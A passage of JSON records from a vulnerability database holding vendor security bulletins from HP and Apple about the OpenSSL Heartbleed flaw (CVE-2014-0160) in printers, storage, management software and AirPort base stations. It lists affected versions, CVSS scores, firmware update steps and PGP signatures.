Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhfjwACgkQ4B86/C0qfVkhMgCg+QcqGt6ad3u/sMCYkEDR9Su6\r\nLjYAn0xSUE51gcQ8Oap+n5GKA8ouoARE\r\n=xVqC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03030 rev.1 - HP Service Pack for ProLiant (SPP) Bundled Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30523", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3\r\n\r\nAirPort Base Station Firmware Update 7.7.3 is now available and\r\naddresses the following:\r\n\r\nAvailable for:\r\nAirPort Extreme and AirPort Time Capsule base stations with 802.11ac\r\nImpact: An attacker in a privileged network position may obtain\r\nmemory contents\r\nDescription: An out-of-bounds read issue existed in the OpenSSL\r\nlibrary when handling TLS heartbeat extension packets. An attacker in\r\na privileged network position could obtain information from process\r\nmemory. This issue was addressed through additional bounds checking.\r\nOnly AirPort Extreme and AirPort Time Capsule base stations with\r\n802.11ac are affected, and only if they have Back to My Mac or Send\r\nDiagnostics enabled. Other AirPort base stations are not impacted by\r\nthis issue.\r\nCVE-ID\r\nCVE-2014-0160 : Riku, Antti, and Matti of Codenomicon and Neel Mehta\r\nof Google Security\r\n\r\n\r\nInstallation note for Firmware version 7.7.3\r\n\r\nFirmware version 7.7.3 is installed on AirPort Extreme or AirPort\r\nTime Capsule base stations with 802.11ac using AirPort Utility for\r\nMac or iOS.\r\n\r\nUse AirPort Utility 6.3.1 or later on OS X, or AirPort Utility 1.3.1\r\nor later on iOS to upgrade to Firmware version 7.7.3.\r\n\r\nAirPort Utility for Mac is a free download from\r\nhttp://www.apple.com/support/downloads/ and AirPort Utility for iOS\r\nis a free download from the App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJTVrLwAAoJEPefwLHPlZEw/doQAKGp94bWEOwMpmd5Wl5+pq9r\r\n1P/ONcCoQoUSyHmOFC232Ep4/t/SSoFs/2ZzbaJ8dg2mjGbDga3oIvknZl64I8fu\r\njTQ0XGjQLmqi1QiC1xWulIqcN2ThJDiaSKqbnOdwziufwdkWDEBxjITficeghXxH\r\nKxf+hyNAUV35dmfOhIMjrbQ8p4Q124C0+JY3Qj+KVaTTXIJAKFqD1dL14oJ2vRHM\r\nC9cY/dlvNFvkNsbhdc1zX4qkwGHaoo5Z+Io06A+5H2zgPtokOs6xd4Or/aPnz2Jv\r\nKt18MYAdXBy1HI+OATVs9k6P7MEawT1dMaDWcPaCQn5FHbMkamThxQXC1tGhjH1H\r\nyYRBK0eGwMSYqG6xNa/v0U9L0t/P3ftSIBBs1TBIVrahw9JQqKtZkTbCb9gOtnpD\r\nlD/i7EjLrvyoHd9l08jF5cM2pcfVqfcaPY5xzTuFL396zipfAOdhEtU8fRuZmhpO\r\nUuq2PoMKBZC1qKFezsQfRuDu99MxObOuWnRquBFNcNyWyt1FUKc+q2CeULu0lgtJ\r\nxzXEw8SzBIq24ICzQrOwsX2DCGe2xoYtNFzT4rpyM/nGAAZ0zH/tNdUmBA3kdtJI\r\nZKUjL0cikKFUOR49tRbh9O/QYykKbkYIOzGr34NBXC62rWJf+VzONtLBDyQp5cY2\r\ntxmN2j8ieuq9rty7QExG\r\n=uoJs\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30553", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30553", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262495\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262495\r\nVersion: 1\r\n\r\nHPSBPI03014 rev.1 - HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP\r\nPrinters, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-24\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP LaserJet Pro MFP Printers, HP Color\r\nLaserJet Pro MFP Printers. This is the OpenSSL vulnerability known as\r\n"Heartbleed" (CVE-2014-0160) which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101524\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nPlease refer to the RESOLUTION\r\n below for a list of impacted products.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\nHP has provided firmware updates that address this vulnerability. Please see\r\nthe table below. To obtain the updated firmware, follow the below steps to\r\nobtain the firmware Update. Obtain the firmware update from\r\nwww.hp.com/go/support\r\n\r\nSelect "Drivers & Downloads".\r\nEnter the product name listed in the table below into the search field.\r\nClick on "Go".\r\nClick on the appropriate product.\r\nUnder "Select operating system" select any Windows operating system from the\r\nlist.\r\nSelect the appropriate firmware update under "Firmware".\r\nProduct Name\r\n Model Number\r\n Firmware Revision\r\n\r\nProduct Name\r\n Model\r\n Firmware Update Version\r\n\r\nHP LaserJet Pro M435nw Multifunction Printer\r\n A3E42A\r\n v 20140411 (or higher)\r\n\r\nHP LaserJet Pro 500 color MFP M570\r\n CZ271A, CZ272A\r\n v 20140411 (or higher)\r\n\r\nHP LaserJet Pro M521 Multifunction Printer\r\n A8P79A, A8P80A\r\n v 20140411 (or higher)\r\n\r\nHP Color LaserJet Pro MFP M476\r\n CF387A, CF386A, CF385A\r\n v 20140410 (or higher)\r\n\r\nHP LaserJet Pro M701/M706 Printer\r\n B6S00A, B6S01A, B6S02A\r\n v 20140411 (or higher)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNZO6YACgkQ4B86/C0qfVnhQQCgutIRqEDGtE2Tc9XhvIB1o3Hs\r\niIQAn3IMrMAAQMH9IBqEr/Xyu3fOgzD/\r\n=XiuT\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "[security bulletin] HPSBPI03014 rev.1 - HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP Printers, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30537", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264595\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264595\r\nVersion: 1\r\n\r\nHPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-01\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP IBRIX X9320\r\nStorage running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101514\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP IBRIX X9320 Storage systems running HP StoreAll OS v6.3.3, v6.5 and v6.5.1\r\nwith these SKUs:\r\n\r\nQP333A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP334A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP335A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP336A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP337A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Starter Kit\r\n\r\nQP338A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Expansion Kit\r\n\r\nQZ722A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Starter Kit\r\n\r\nQZ723A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Expansion Kit\r\n\r\nQZ724A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ725A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nQZ726A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ727A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP IBRIX X9320 Storage. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nUntil the software updates are available, HP recommends restricting\r\nadministrative access to the MSA on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNiyroACgkQ4B86/C0qfVmYEwCgoYdOOiwyP2DpeGeGb40tS0Br\r\njfMAoMLbmVB2pdVa9XAfs92eV2+hhLNu\r\n=ZY1m\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30524", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30524", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04263236\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04263236\r\nVersion: 1\r\n\r\nHPSBMU03022 rev.1 - HP Systems Insight Manager (SIM) Bundled Software running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Systems\r\nInsight Management (SIM) bundled software running OpenSSL. This is the\r\nOpenSSL vulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nThe HP SIM software itself is not vulnerable to CVE-2014-0160 ("Heartbleed").\r\nHowever, the software components bundled with HP SIM are impacted and should\r\nbe addressed if installed.\r\n\r\nReferences: CVE-2014-0160, SSRT101527\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Systems Insight Manager 7.2, 7.2.1, 7.2.2, 7.3, and 7.3.1 bundled with the\r\nfollowing software:\r\n\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted software components\r\nbundled with HP Systems Insight Manager (SIM) in the following HP Security\r\nBulletins:\r\n\r\nHP SIM Component\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)\r\non Linux and Windows,\r\n HPSBMU03020\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 25 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNa0M0ACgkQ4B86/C0qfVnwcQCbBHf1U9zP1TpxM3zBMKj2JqzY\r\nyM0AoPkddMdUy25n2X4X7cBVwWqZcdgI\r\n=LU+V\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03022 rev.1 - HP Systems Insight Manager (SIM) Bundled Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30497", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30497", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 1\r\n\r\nHPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Onboard Administrator (OA). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nNotes\r\n\r\nCustomers also have the option to downgrade OA firmware to any version prior\r\nto OA v4.11 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVmEFACggs/Q1GaEsxwM9Vq17prvnMA9\r\nzwsAn08KV2HUERq6QUThuGZ4USDSSh9S\r\n=ItbO\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30475", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT 